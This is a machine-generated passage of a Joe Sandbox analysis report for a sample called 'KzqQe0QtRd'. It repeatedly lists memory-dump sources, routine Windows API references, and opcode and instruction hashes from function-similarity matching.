                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                            • Opcode ID: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
                                                                                                                                                                                            • Instruction ID: deb96378922069e9449aaa6e734a23ed820499194c2f51a626e2133b215c3b46
                                                                                                                                                                                            • Opcode Fuzzy Hash: c2ae5bf7dfd723bcaf49b473343ea681dff7813d4b8ca545b941fb3c7d872366
                                                                                                                                                                                            • Instruction Fuzzy Hash: E8118261718A8285DB10EB25B81416AA761AF45FF4F944331EA7D477E9CFBCD0518740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7012748C1), ref: 00007FF7012749DF
                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7012748C1), ref: 00007FF7012749F5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                            • Opcode ID: 76a0f45c7603eb3144ff1d93a1bd9f2a60a94205705e5cf30b36b262cefc7e5d
                                                                                                                                                                                            • Instruction ID: 2129a20e358fa0234b5cfc850ef7ea5a4a7da48d424ce0f4097e590e3a928cd3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 76a0f45c7603eb3144ff1d93a1bd9f2a60a94205705e5cf30b36b262cefc7e5d
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0811917170C69382EB64BB15A81113BF7A0FF857B1F900236E69D819D8EFACD054CB20
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF701276831), ref: 00007FF7012769D7
                                                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF701276831), ref: 00007FF7012769ED
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                                                            • Opcode ID: 14afd3b3f8d21bfe08da8d2c94d9a3dfa04636ade17287008c3a70831778f0b0
                                                                                                                                                                                            • Instruction ID: e0c96611f41c88640160ec0b3651938c3ad28e4bfc7295258bee9aaaeb2e6206
                                                                                                                                                                                            • Opcode Fuzzy Hash: 14afd3b3f8d21bfe08da8d2c94d9a3dfa04636ade17287008c3a70831778f0b0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B015E7261C65286E760BF15A80127BF7B1FF81761FA04236E6AD419D8DFBDD050DB20
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlReleasePrivilege.NTDLL(?,?,?,00007FF701281E72,?,?,?,00007FF701281EAF,?,?,00000000,00007FF701282375,?,?,?,00007FF7012822A7), ref: 00007FF701279E5E
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF701281E72,?,?,?,00007FF701281EAF,?,?,00000000,00007FF701282375,?,?,?,00007FF7012822A7), ref: 00007FF701279E68
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastPrivilegeRelease
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1334314998-0
                                                                                                                                                                                            • Opcode ID: 90a3e1b0ca63f129125972b75d02b7296718c6d583bf4673ea5362494b00de43
                                                                                                                                                                                            • Instruction ID: 01715287b46f4ddbe376b6f3be8f21cd8bd4a80ae73987f0c13ea153fe0b6407
                                                                                                                                                                                            • Opcode Fuzzy Hash: 90a3e1b0ca63f129125972b75d02b7296718c6d583bf4673ea5362494b00de43
                                                                                                                                                                                            • Instruction Fuzzy Hash: 21E08C50F0934383FF18FBF2AC4517AA2609F84B50FC41436D90E87262DFACA8868330
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                                                            • Opcode ID: f413b4ddc67d8632ac5557a0a97acca73a4185b66c4a9911fb05703a719da85e
                                                                                                                                                                                            • Instruction ID: ec835d4d1f1e73fd81ed171760e924cef074b16e8c0d391178103fad15a9930a
                                                                                                                                                                                            • Opcode Fuzzy Hash: f413b4ddc67d8632ac5557a0a97acca73a4185b66c4a9911fb05703a719da85e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 71D0C914F6A98381F71877724C4513A91906F44760FE00632C01AC21D1EF9CA0554721
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2018770650-0
                                                                                                                                                                                            • Opcode ID: 85f758df515426b71bd3396e0c87f7450f551412155cbcefa8c343172ad84c23
                                                                                                                                                                                            • Instruction ID: 1787468ce7e4bb482fb327ba0e151adda03e0365995298daf3898806fefc546c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 85f758df515426b71bd3396e0c87f7450f551412155cbcefa8c343172ad84c23
                                                                                                                                                                                            • Instruction Fuzzy Hash: 26D01214F1B94382F71877710C8513A91917F44720FE00631C01FC21D1DFDCA19A4332
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00007FF701267A60: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7012626FB), ref: 00007FF701267A9A
                                                                                                                                                                                            • _findclose.LIBCMT ref: 00007FF701266F19
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ByteCharMultiWide_findclose
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2772937645-0
                                                                                                                                                                                            • Opcode ID: 7fe47906ca24b9e40dbd510e963534dad387cceb1d89c29984a36407787f434f
                                                                                                                                                                                            • Instruction ID: 1d02ca11ba13bc6594f11f27735b7c56095433c2f8594c924a4e9bbc0683a47d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fe47906ca24b9e40dbd510e963534dad387cceb1d89c29984a36407787f434f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9B71A652E18AC681E710DB2CC9052FDB360FBA9B4CF95E321DB8C12592EF68E2D5C740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                            • Opcode ID: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
                                                                                                                                                                                            • Instruction ID: 6e1b23b616911d874cc51ba03b5d6f43666229df0e6bfd47237e04bbdec97e21
                                                                                                                                                                                            • Opcode Fuzzy Hash: cd414821b6f546225101efcda0891026701ff68dd4107860c76c66003ece607e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0041B632B0924787EB24EB19A96017AB3A1EF56B55F940135DB8E836D1CFACE442C770
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                            • Opcode ID: 52f1c7d6e99280486ae186c1f8f48b0b8276d342a8770e29d13f851c60b4761c
                                                                                                                                                                                            • Instruction ID: 2a91a52c17470017a36f8755d219d8ae1526d7b21ab42e27016f5c35e2a8cb4e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 52f1c7d6e99280486ae186c1f8f48b0b8276d342a8770e29d13f851c60b4761c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 75215921B1929386EB24BB2279153BAE651BF45BD8FC85430EE490B786CFBDE4518610
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                            • Opcode ID: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
                                                                                                                                                                                            • Instruction ID: e627d9f05b64cf26b9d485902b1ea4a37bd05850952d0b18b8bddcd3da33b3a0
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ed01260f61c1a9edb3b9c9d383e1d052b4bb4cd62c1ee8f87bb56751b307cf1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 92318C62B1865386FB11FB158C5137EA660AF40BA0FD50636EA2D073D2CFFCA8428731
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                                                            • Opcode ID: 6fb3310ffc3292af0fdd94bbbd9082ba6701090cdfedec6a3c43b4571714928a
                                                                                                                                                                                            • Instruction ID: bef1ade46640c35812d6db2d849ef1bc0cfc95f6307751bb5f6974ef7571658e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fb3310ffc3292af0fdd94bbbd9082ba6701090cdfedec6a3c43b4571714928a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 16219C32F0470689EB24EF64D8482ED73A1FF44318F940A3AD62C06AC6DFB8D584C760
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                            • Opcode ID: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                            • Instruction ID: 463b4f906469bb385dad08d97eda29856cbd9c96ca3022789be9d339b207970a
                                                                                                                                                                                            • Opcode Fuzzy Hash: be1079961907d1906d587a3e65c1e024338dd0a3e917ec7f85ba85c18500dcb2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 09114D21B0C68381EF61FF11AC2127FE2A0EF85B81F884431EA8C57A96CFBDD5418720
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                            • Opcode ID: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
                                                                                                                                                                                            • Instruction ID: 0f335570be1c61916f09707050e5df3a0a714c3907de4cdb81fb6442a68967a8
                                                                                                                                                                                            • Opcode Fuzzy Hash: bfd0dbd31329e8855e2ea518bb8c472100a71056899b27504ce81c8632d734fa
                                                                                                                                                                                            • Instruction Fuzzy Hash: CC21C232B18A4387EB65AF18D840379B6A0EF84B94FA44234EA5D87AD9DF7CD441CB10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                            • Opcode ID: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                                            • Instruction ID: b369e38d9b4f34b2d016b81cc2577a8fcd28e479ffbc0ad5f50acb91a754444d
                                                                                                                                                                                            • Opcode Fuzzy Hash: f8ccbbb08b6b64fca274b3102351a157ba9f641dbe881e0fbefe782dfe020abd
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A018221B0878341EB04FB66AE1106AE695AF85FE0F884631DE6C57BE6CFBCD8518310
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                            • Opcode ID: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                                            • Instruction ID: 2947636348d2a4e2827f5374b83803cc8440ad83bfe2434b20c50626bb806a76
                                                                                                                                                                                            • Opcode Fuzzy Hash: ff7701af8cb768011259a96fb0cdaae69b45464d9f9b930ea94a69369e7e69e2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 15114632B18A4382F310FB14AC4057AF2A5EF45740FC50578E65D577A2EFACF8208B20
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF70127A8E6,?,?,?,00007FF701279AA3,?,?,00000000,00007FF701279D3E), ref: 00007FF70127DDC5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.299838082.00007FF701261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF701260000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.299824191.00007FF701260000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299856048.00007FF70128A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF70129D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299873007.00007FF7012AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.299902175.00007FF7012AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff701260000_KzqQe0QtRd.jbxd
